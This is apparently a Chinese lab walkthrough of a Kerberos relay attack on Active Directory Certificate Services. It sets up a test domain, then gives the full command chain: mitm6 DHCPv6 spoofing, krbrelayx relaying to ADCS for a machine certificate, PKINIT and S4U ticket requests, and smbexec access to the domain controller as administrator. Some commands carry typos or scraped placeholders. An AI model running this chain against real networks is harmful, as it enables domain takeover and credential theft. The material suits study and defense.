kerberos中继攻击


title: kerberos中继攻击
date: 2022-03-11
tags: [‘kerberos’,‘中继’]
copyright: true

环境搭建

  1. DC ip:192.168.21.2 域名:DC.rangenet.com

  2. ADCS ip:192.168.21.3 域名:adcs.rangenet.com

  3. 一台win10域成员 ip:192.168.21.4 域名win10.rangenet.com

  4. 攻击机kali ip:192.168.21.10

DC搭建

选择一台winserver搭建adcs服务,这里是winserver2016。选择Active Directory 域服务,其他默认即可。

kerberos中继攻击_第1张图片

安装完成之后,提升为域控制器,开始配置域控。

添加新林rangenet.com,其他默认,然后一步步到安装。

kerberos中继攻击_第2张图片

kerberos中继攻击_第3张图片

ADCS搭建

选择一台winserver搭建adcs服务,这里是winserver2016。然后先将这台server加入到rangenet.com域中

kerberos中继攻击_第4张图片

kerberos中继攻击_第5张图片

重启之后,使用域控账号登录(因为要安装ADCS服务需要登陆账号属于Enterprise Admins组,为了方便这里使用域控账号登录)

kerberos中继攻击_第6张图片

下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。

服务器管理器–>添加角色和功能向导–>勾选服务器角色–>Active Director 证书服务

kerberos中继攻击_第7张图片

kerberos中继攻击_第8张图片

开始安装

kerberos中继攻击_第9张图片

配置ADCS服务,只需要注意下面截图的内容,其他都是默认。

kerberos中继攻击_第10张图片

kerberos中继攻击_第11张图片

kerberos中继攻击_第12张图片

kerberos中继攻击_第13张图片

kerberos中继攻击_第14张图片

访问http://localhost/certsrv出现登录框

kerberos中继攻击_第15张图片

输入系统账号即可进入,出现下面界面,表示安装成功。

kerberos中继攻击_第16张图片

Kerberos中继攻击

Kali中添加域控ip为dns

kerberos中继攻击_第17张图片

改完后ping一下域成员,能ping通即可

kerberos中继攻击_第18张图片

开始攻击

使用mitm6监听DHCPV6请求。

Mitm6 –domain rangenet.com –host-allowlist win10.rangenet.com –relay adcs.rangenet.com -v

–domain 是要攻击的域名

–host-allowlist是过滤win10这台机器的请求

–relay是转发请求的地址,这里填adcs地址

kerberos中继攻击_第19张图片

使用krbrelays.py中继kerberos协议.

Pyhton3 krbrelayx.py –target http://adcs.rangenet.com/certsrv/ -ip 192.168.21.10 –victim win10.rangenet.com –adcs –template Machine

–target 是adcs证书服务的url地址

-ip是当前ip(内网中控制的机器,这里把kali直接放在内网中了)

–victim是受害者域名

kerberos中继攻击_第20张图片

然后重启win10,当win10成员机获取网络连接时会发出DHCPv6请求的包,以便mitm6可以接管DHCPv6请求。

kerberos中继攻击_第21张图片

Krbrelax.py成功中继到证书

kerberos中继攻击_第22张图片

证书太长,把证书复制到文件里,方便复制全证书

kerberos中继攻击_第23张图片

接下来使用证书去向域控获取tgt,我们使用gettgtpkinit.py来模拟这个过程。

python gettgtpkinit.py -pfx-base64 一大串证书 rangenet.com/win10$ win10.ccache

kerberos中继攻击_第24张图片

报下面截图的错是因为时钟问题,DC的时间太落后了,调回正常时间即可。

kerberos中继攻击_第25张图片

下面成功获取到tgt票据

kerberos中继攻击_第26张图片

接下来请求管理员票据

python gets4uticket.py kerberos+ccache://rangenet.com\win10$:win10.ccache@DC主机名.rangenet.com cifs/[email protected] [email protected] admin.ccache

DC主机名在mitm6处理的请求中可以找到

kerberos中继攻击_第27张图片

图形用户界面, 文本, 网站  描述已自动生成

然后就可以使用管理员票据去登录机器了

KRB5CCNAME=admin.ccache python …/impacket/examples/smbexec.py -k rangenet.com/[email protected] -no-pass

kerberos中继攻击_第28张图片

你可能感兴趣的:(服务器,网络,运维)